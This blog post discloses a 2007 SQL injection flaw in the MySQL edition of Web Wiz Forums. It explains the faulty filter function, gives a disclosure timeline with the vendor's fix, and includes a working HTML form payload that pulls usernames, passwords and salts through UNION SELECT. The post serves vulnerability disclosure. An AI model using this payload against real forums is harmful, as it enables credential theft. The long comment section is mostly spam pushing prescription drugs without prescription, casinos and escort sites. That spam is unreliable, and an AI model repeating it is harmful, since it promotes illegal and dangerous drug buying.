There is a vulnerability in MySQL version of Web Wiz Forums, free ASP bulletin board system software, enabling SQL injection. The vulnerability is in the code used to filter string parameters prior to including them in the SQL queries:
'Format SQL Query funtion
Private Function formatSQLInput(ByVal strInputEntry)
'Remove malisous charcters from sql
strInputEntry = Replace(strInputEntry, "\'", "\'", 1, -1, 1)
strInputEntry = Replace(strInputEntry, """", "", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "'", "''", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "[", "[", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "]", "]", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "<", "<", 1, -1, 1)
strInputEntry = Replace(strInputEntry, ">", ">", 1, -1, 1)
'Return
formatSQLInput = strInputEntry
End Function
Assume the user enters a string containing the following sequence of characters: \"' (a backslash, followed by a double quote followed by a single quote). The first line inside the function above would do nothing, the second line would remove the double quote, and after the third line the sequence would look like \'' (a backslash followed by two single quotes). In MySQL the first two characters would be interpreted as an escaped single quote and the third character would terminate the quotes thus allowing injection of arbitrary SQL code placed after it.
Only the MySQL version of the Web Wiz Forums is vulnerable to this as SQL Server and MS Access don't use backslash as an escape character.
Below I include a small exploit that demonstrates this vulnerability.
Mar 19th 2007: Vulnerability discovered
Mar 20th 2007: Vendor contacted
Mar 20th 2007: Vendor responded
Mar 20th 2007: Vendor released fixed version (8.05a)
<form method="post" action="http://localhost/forum/pop_up_member_search.asp?">
<input type="hidden" name="name" id="name" value="\"' union select concat(userusernamename,char(58),passpasswordword,char(58),sasaltlt) from tblautauthorhor /*" >
<input type="submit" value="Go">
</form>
785 comments:
1 – 200 of 785 Newer› Newest»It seems vendor did well once. Fast contact and fast patch -even patch was simply to make-. Good job.
duiDeqlMHfoNtfY, [url=http://students.wrdsb.ca/cudnl9682/2012/02/19/not-a-summer-to-remember/]vogue best anti aging cream[/url] ,:-#, anti aging skin care manufacturers ,97252, http://socialenginezzz.com/Concepcion best anti aging body creams, 2506,
www.ccip.govt.nz
[URL=http://www.supercandy.net/cat/CGI/apus/apus.cgi ]best anti age cream dry skin [/URL]
juliet's anti ageing cream
http://www.papera.com/entry.php
[URL=http://www.pechenokill.com/2012/06/vassiviere-fin-mai-2012/ ]anti aging skin care during pregnancy [/URL]
best anti aging moisture cream
http://www.cestujme.cz/imgupload-upload-obrazkov-s-26574.html
xanax 0.5mg what does generic xanax look like pill - xanax overdose painless
buy tramadol cod next day delivery order tramadol online overnight - purchase tramadol online no prescription
buy xanax online without prescription xanax dosage- yellow bars - i need xanax for anxiety
diazepam cheap diazepam lorazepam alcohol withdrawal - diazepam benefits side effects
where to buy xanax online cheap xanax bars - xanax bars rap
buy xanax 1mg xanax pills colors - xanax withdrawal 2012
buy diazepam different forms drug diazepam comes - valium side effects memory loss
xanax price xanax street value - xanax effects dosage
diazepam half life diazepam online canada - diazepam 2 mg tabletki
buy xanax online overnight delivery xanax 1 mg yellow - xanax lethal dose
intravenous diazepam cheapest diazepam online - diazepam 5mg to buy
online diazepam diazepam in dogs side effects - diazepam recreational use dosage
discount phentermine lannett phentermine 0597 - phentermine online in canada
buy phentermine buy phentermine b12 - where can i buy phentermine uk
buy diazepam online diazepam online no prescription usa - buy diazepam online legally usa
alprazolam mg xanax street value 2mg - xanax withdrawal symptoms headache
can you buy xanax online buy xanax with echeck - buy xanax online prescription
buy diazepam online 2mg lorazepam equivalent diazepam - diazepam 5mg
purchase phentermine buy phentermine online no prescription uk - лекарство phentermine
phentermine online buy phentermine michigan - phentermine online order reviews
xanax without a perscription xanax pill finder - xanax withdrawal really bad
buy diazepam online diazepam erowid vault - buying diazepam online for cheap
ambien for sale ambien side effects tinnitus - ambien cr rxlist
ambien for sale no prescription ambien side effects headache - is ambien sleep real sleep
buy phentermine cheap phentermine - buy legitimate phentermine online
buy phentermine online buy phentermine online no prescription uk - phentermine jacksonville fl
generic ambien cost ambien 10mg - generic substitute ambien cr
where to buy ambien online ambien can you snort - zopiclone ambien zolpidem
xanax anxiety xanax 2 mg how long - pictures generic xanax tablets
buy ambien ambien extended release generic - what drug group is ambien in
buy xanax online no rx difference between xanax bars xanax - xanax overdose child
ambien for sale online does ambien cr 12.5 look like - can i buy ambien on line
buy xanax online no prescription cheap pictures of all generic xanax - xanax dosage sedation
how to buy xanax online reviews on buying xanax online - generic xanax white
online xanax xanax 2mg australia - xanax bars vs klonopin
where to buy xanax online no prescription does xanax show up on probation drug test - buy-xanaxonline.com
online diazepam diazepam 10 mg myl - order diazepam from europe
buy diazepam buy diazepam online australia - diazepam 2mg nebenwirkungen
ambien cost ambien withdrawal death - ambien yaz
buy alprazolam xanax withdrawal like - xanax dosage before flight
buy phentermine online phentermine buy online - buy phentermine online us pharmacy
alprazolam buy shoot up xanax pills - xanax lyrics
lethal dose of diazepam buy cheapest diazepam online - diazepam dosage rabbits
alprazolam xanax will one xanax show up drug test - xanax drug action
xanax no prescription online xanax overdose much - xanax side effects weight loss
order phentermine online buy phentermine online with no prescription - buy phentermine in canada
buy diazepam buy diazepam in australia - cheap diazepam usa
buy phentermine buy phentermine 37.5 tablets online - buy phentermine weight loss
diazepam dog buy diazepam no prescription needed - diazepam 5mg for muscle spasms
phentermine online buy phentermine online yahoo answers - phentermine online prescription consultation
cheap diazepam can you buy diazepam in thailand - diazepam 5 mg recreational use
order phentermine online doctor prescribe phentermine - can i buy phentermine online
cheap generic phentermine buy phentermine in canada online - phentermine tablets 37.5
phentermine pills phentermine 37.5 weight loss stories - buy phentermine online forum
ambien order ambien side effects dizziness - ambien cr blue pill
buy ambien buy ambien online india - ambien cr take
purchase ambien ambien side effects paranoia - ambien cr usa
order ambien without prescriptions ambien 3rd trimester - 2 ambien high
soma buy carisoprodol 350 mg tab mutual - buy qualitest soma online
buy cheap xanax yellow xanax bars 039 - xanax 6mg
soma drug carisoprodol capsules - carisoprodol dan 5513 side effects
xanax for sale cost generic xanax walmart - 2mg xanax 2 beers
ambien pill ambien sleep cooking - ambien taper
buy xanax bars online buy xanax online without prescriptions - buy xanax pfizer
ambien sleep medication is generic ambien available in u.s. - buy ambien fast shipping
xanax drug xanax drug doses - buy xanax bars
buy diazepam online no prescription diazepam 10mg thailand - diazepam withdrawal newborn
buy xanax online cheap 30 mg xanax overdose - buy xanax online spain
xanax order no prescription xanax overdose toxicity - xanax 2mg green
what does diazepam look like diazepam 5mg to buy - diazepam sleep dosage
diazepam buy can you buy diazepam egypt - buy diazepam in usa
buy xanax bars online 1.5 mg xanax high dose - makers generic xanax
buy xanax sizes of xanax pills - xanax for dogs with anxiety
buy phentermine online phentermine 37.5 buy online - buy phentermine online pharmacy
order xanax no prescription xanax withdrawal ocd - xanax dosage for flying
buy diazepam without prescription diazepam 10mg buy - buy diazepam online no prescription usa
buy phentermine phentermine jackson tn - phentermine 4 months
xanax anxiety xanax side effects list - how get xanax online
buy xanax order xanax online pharmacy - xanax drug anxiety
buy phentermine phentermine online prescription - buy phentermine with paypal
valium diazepam manufacturers diazepam withdrawal protocol - can you buy diazepam online usa
buy phentermine buy phentermine canada - buy phentermine online forum
online diazepam diazepam withdrawal plan - snorting diazepam erowid
buy xanax xanax side effects urination - xanax bars double stack
buy xanax online cheap no prescription xanax effects neurotransmitters - xanax for sale no prescription
phentermine online buy phentermine online from uk - phentermine experiences
buy phentermine phentermine purchase - buy phentermine online uk
ambien price ambien sleep latency - ambien side effects itching
buy generic ambien online ambien pill price - what is ambien high like
phentermine online pharmacy phentermine bad breath - phentermine 75
generic ambien online buy ambien online us pharmacy - cost of generic ambien cr
xanax anxiety generic drug for xanax - suboxone and xanax drug interactions
XuPxfoGjrCpdmU, [url=http://daclan.lankymart.com/forum/profile.php?id=1141]list of penny stocks 2012[/url] ,:-<, otc stock quote ,:-/, http://www.skin-essence.com/page23.php investing financial, :-],
www.ccip.govt.nz
[URL=http://www.cockmanfamily.com/guestbook4.htm ]which stocks to buy today [/URL]
penny stock fortunes newsletter
http://www.falerpan.it/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=
[URL=http://www.psychicreadingnow.net/Guestbook_Reviews.php?Guestbook_CurrentPageNumber_131808=2 ]day trading penny stocks online [/URL]
small cap index fund
http://www.hajka.estranky.cz/clanky/navstevni-kniha.14.html
pXOTOCucYEH, [url=http://www.cagrn.org/groups/no-deposit-bonus-hyip-is-successful-predestined-by-us-to-charm-on-your/]free no deposit casino bonus codes u.s.a. welcome[/url] ,7133, code bonus pour casino 888 ,TreOJcjRwVO, http://businessmodelsbeyondprofit.com/groups/club-world-casino-bonus-codes-2012-very-nonclassical-games-amidst-online-games-one-would-stargaze-or/ slots inferno casino no deposit bonus, BeFrVVGPkjs,
www.ccip.govt.nz
[URL=http://www.lora.org/wordpress/?p=3#comment-839 ]havana casino no deposit bonus [/URL]
title 500 free online casino bonus for all new players
http://www.duckin.co.kr/board/qnaboard_view.php?thp=prboard&station=&thread=12661&serial=17882&whatfield=&keywords=&list_num=118&first=170&cg_id=
[URL=http://www.inter-aktiv.erfolgsrakete.de/?path=forumsdisplay ]captain jack casino no deposit bonuses [/URL]
online roulette bonus
http://www.yunsobi.com/blog/guestbook
ambien online no prescription generic ambien 93 - ambien sleeping pills overdose
best place to buy xanax online identify generic xanax pills - generic xanax uss
carisoprodol 350 mg somanabolic muscle maximizer ebay - buy soma in georgia
buy soma online buy soma online pharmacy - will soma show up on drug test
buy tramadol without a script tramadol hcl for dogs - tramadol codeine high
ambien medication ambien cr generic fda - buy ambien generic
xanax online xanax wikipedia pl - xanax 60 minutes
order alprazolam online mexican pharmacy xanax - overdose 4mg xanax
buy soma online legal to buy soma online - buy somatropin hgh online
soma drug soma compound more drug_side_effects - soma 10 panel drug screen
cheap generic xanax xanax bars 2 mg street price - 4 xanax and alcohol
buy zolpidem ambien dosage - zolpidem weaker than ambien
diazepam 10 mg diazepam 2mg online - how long does a diazepam high last
generic xanax buy cheap xanax from canada - where to buy generic xanax online
buy diazepam diazepam online europe - diazepam 5mg effects
buy soma online soma side effects long term - buy somatropin in the u.s
buy soma buy soma online with mastercard - buy soma uk
cheap tramadol online order tramadol cash on delivery - tramadol online missouri
buy xanax buy valium xanax online - drug used get off xanax
buy generic ambien ambien 10 mg generic - ambien cr kidney disease
buy diazepam online diazepam 2mg overdose - diazepam dosage im
how to buy xanax online buy alprazolam 3mg - xanax for mri anxiety
buy tramadol online buy tramadol money order - buy tramadol cheap online no prescription
buy diazepam online diazepam job interview - buy diazepam online
buy tramadol cheap online tramadol dosage and effects - legal order ultram online
buy diazepam online diazepam side effects grapefruit - mirtazapine diazepam side effects
buy tramadol buy tramadol us pharmacy - buy tramadol at walmart
diazepam online diazepam to get high - rectal diazepam side effects
diazepam cheap diazepam for dogs with seizures - diazepam for dogs 5 mg
purchase xanax xanax high duration - can you take 2 mg xanax at once
where can i buy xanax online legally buy xanax craigslist - buying xanax without a script
cheap tramadol online buy ultram with no prescription - buy tramadol 99
buy xanax online side effects prolonged use xanax - cheap xanax sale
xanax no rx xanax in alcohol - xanax bars empty stomach
purchase tramadol tramadol hcl acetaminophen - buy tramadol canada
cheap diazepam online order diazepam online - diazepam vs temazepam
buy tramadol cheap can you buy ultram canada - tramadol hcl drug interactions
buy diazepam online buy cheap diazepam from india - buy cheap diazepam online no prescription
order tramadol safe place buy ultram - buy tramadol 6914
buy ambien ambien insomnia medication - ambien side effects alcohol
buy xanax online cheap buy xanax online illegal - xanax side effects in women
buy tramadol online tramadol hcl medication - buy tramadol for dogs
soma for sale what is carisoprodol 350 mg tablet for - soma internet radio
buy alprazolam buy xanax online in australia - do they drug test xanax
diazepam injection valium diazepam dosage - diazepam dosis erowid
soma without prescription carisoprodol cannabis - side effects of taking carisoprodol
buy tramadol online without a prescription safest place buy tramadol online - usual dosage tramadol dogs
order ambien without prescriptions breaking ambien pill - much does ambien cost
buy tramadol cod next day delivery tramadol reactions - tramadol dosage dogs after surgery
diazepam online diazepam 5mg snort - diazepam 10mg usa
buy ambien ambien withdrawal night sweats - ambien 10 mg beer
where to buy tramadol online buy ultram with no prescription - tramadol 420chan
soma sale somanabolic muscle maximizer money back - buy soma online cod fedex
alprazolam xanax get you high - xanax bars 15 mg
what is diazepam used for buy diazepam 2mg usa - diazepam online paypal
buy xanax 2mg klonopin vs 2mg xanax - xanax side effects on pregnancy
buy soma online soma medication ingredients - buy somatropin canada
buy tramadol tramadol xl - tramadol hcl 50mg narcotic
generic zolpidem ambien during pregnancy 3rd trimester - ambien withdrawal heart
buy tramadol 100mg online buy ultram online no rx - tramadol online sale
buy diazepam valium side effects men - que es mejor diazepam o tranxilium
generic ambien ambien drug information - ambience mall gurgaon tuesday closed
buy tramadol cod next day delivery tramadol apap - high on tramadol hcl
buy xanax xanax dosage sizes - buy xanax online visa
soma online soma drug test benzo - carisoprodol much get high
alprazolam 0.5mg michael jackson xanax dosage - order xanax no prescription
diazepam generic baclofen diazepam withdrawal - diazepam valium history
carisoprodol 350 mg purchase soma online legal - buy cheap generic soma
order alprazolam no prescription effects of xanax pills - what are the effects of prolonged use of xanax
buy tramadol india tramadol purchase online uk - buy tramadol with visa
ambien order ambien usa - generic ambien sandoz
generic ambien online zolpidem vs ambien - buy ambien cr 12.5/ no prescription
where to buy tramadol buy tramadol legally online - tramadol kick in time
tramadol online cheap tramadol for sale - tramadol 50mg get you high
carisoprodol drug where to buy soma seeds - buy soma from canada
buy tramadol overnight delivery tramadol 50 mg veterinary use - tramadol ketorolaco
also regard it was a high-end extravagance products cited pride showing improbable in front of people to really speechles investigate [url=http://www.shanghaimassage90.com]shanghai escort[/url] exclusive
buy tramadol medication order tramadol us pharmacy - buy tramadol online yahoo
cheap generic xanax long term side effects xanax xr - xanax maximum dosage
buy tramadol with paypal tramadol hcl er 300 - 50mg tramadol high dose
legal buy tramadol online tramadol high yahoo answers - cheap tramadol without prescriptions
soma generic carisoprodol prescription - buy soma us pharmacy
xanax 0.5mg 10 panel drug test xanax - xanax classification
buy tramadol no prescription overnight tramadol online american pharmacy - tramadol er
buy tramadol in florida buy tramadol uk online - tramadol no prescription
buy xanax online without prescription xanax pills street price - xanax dosage humans
buy xanax bars best place buy xanax online - order xanax online no prescription
buy tramadol ultram online cheap - can buy tramadol online uk
buy tramadol online no prescription cod tramadol online fedex - tramadol 50 mg strength
generic tramadol online buy tramadol london - tramadol dosage dogs 50 mg
diazepam online diazepam 5mg tablets side effects - buy diazepam online co usa
alprazolam 0.5mg xanax generic or brand - xanax generic difference
buy xanax xanax 10 panel drug test - alprazolam 0 5mg medley
buy diazepam online no prescription where can i buy valium online yahoo answers - diazepam binding inhibitor
buy tramadol cod online tramadol hcl how much to get high - tramadol 50mg vs 100mg
buy tramadol without rx tramadol 50mg hcl high - buy ultram with mastercard
buy tramadol online is it legal to purchase tramadol online - tramadol dosage opiate withdrawal
cheap ambien no prescription ambien generic version - generic ambien zolpidem
order diazepam buy diazepam 10mg india - es lo mismo diazepam que lorazepam
buy xanax without prescriptions xanax and zoloft overdose - suboxone xanax high
buy ambien ambien sleep tips - ambience mall gurgaon pubs
best buy tramadol tramadol 50mg dosage - tramadol high dose
carisoprodol 350 mg buy soma a+ - purchase soma online legal
is it illegal to buy xanax online xanax bars 93 1003 - generic xanax onax
Post a Comment